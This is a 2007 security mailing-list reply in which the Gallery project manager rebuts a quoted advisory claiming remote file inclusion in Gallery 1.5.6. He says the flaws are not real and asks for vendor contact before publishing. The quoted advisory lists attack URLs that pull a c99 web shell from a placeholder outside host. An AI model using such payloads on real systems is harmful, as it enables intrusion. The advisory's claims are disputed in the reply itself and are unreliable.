Re: gallery >> 1.5.6 Remote File Inclusion

[Chris Kelly <ckdake@xxxxxxxxxx>]

Did you actually try any of these so called "explots"?

As someone else pointed out, these aren't actually exploits.   
content.php is all functions and doesn't do anything when accessed  
directly, and there are explicit globals checks for all of the  
examples you give. If you actually bothered to try any of them (or  
look in the source code) you would see blank pages or messages such as

"Direct Access to this location is not allowed."

Also, it is appreciated if you contact the vendor first instead of  
publishing something to a disclosure mailing list.  The address for  
this is easy to find and is:

security@xxxxxxxxxxxxxxxxxxx

Please do your research next time, and if you actually find a  
security problem, let us know so that we can release a patch for it  
and credit you on our website with the release announcement. thanks!

-Chris
Gallery Project Manager

--
Chris Kelly
ckdake@xxxxxxxxxx
http://ckdake.com/


On Apr 24, 2007, at 11:25 AM, s433d_only_linux@xxxxxxxx wrote:

> ###################################################################### 
> ################################################################
> #gallery >> 1.5.6 Remote File  
> Inclusion                                                              
>                                  #
> #Affected Software : gallery >>  
> 1.5.6                                                                  
>                                #
> #Download..:  http://sourceforge.net/project/downloading.php? 
> group_id=7130&use_mirror=heanet&filename=gallery-1.5.6.tar.gz&66134343 
>   #
> #Risk ..............:  
> high                                                                   
>                                          #
> #Date .........:  
> 24/4/2007                                                              
>                                               #
> #Found by ..........: s433d_only_linux  
> (Dr.Linux)                                                             
>                         #
> #Contact ...........:   
> s433d_only_linux@xxxxxxxx                                              
>                                         #
> #Web .............:  
> Www.hackerz.ir                                                         
>                                            #
> ###################################################################### 
> ################################################################
> #Affected File:
> gallery/lib/content.php
> gallery/lib/content.php
> gallery/lib/content.php
> gallery/lib/content.php
> gallery/setup/frame_test.php
> gallery/contrib/joomla/admin.gallery.php
> gallery/contrib/joomla/toolbar.gallery.php
> gallery/contrib/mambo/admin.gallery.php
> gallery/contrib/mambo/toolbar.gallery.php
> gallery/contrib/phpBB2/modules.php
> gallery/contrib/phpBB2/modules.php
> gallery/contrib/phpBB2/modules.php
> gallery/contrib/phpnuke/modules.php.
> gallery/contrib/phpnuke/modules.php.patch
> ###################################################################### 
> ##################################################################
> # Exploit:
> http://[target]/gallery/lib/content.php?include=http://shellseit/ 
> c99.txt?cmd=ls
> gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
> gallery/lib/content.php?require=http://shell/c99.txt?cmd=ls
> gallery/lib/content.php?=http://shell/c99.txt?cmd=ls
> gallery/contrib/mambo/admin.gallery.php?require_once=http://shell/ 
> c99.txt?cmd=ls
> gallery/contrib/mambo/toolbar.gallery.php?require_once=http://shell/ 
> c99.txt?cmd=ls
> #
> #
> ###################################################################### 
> #################################################################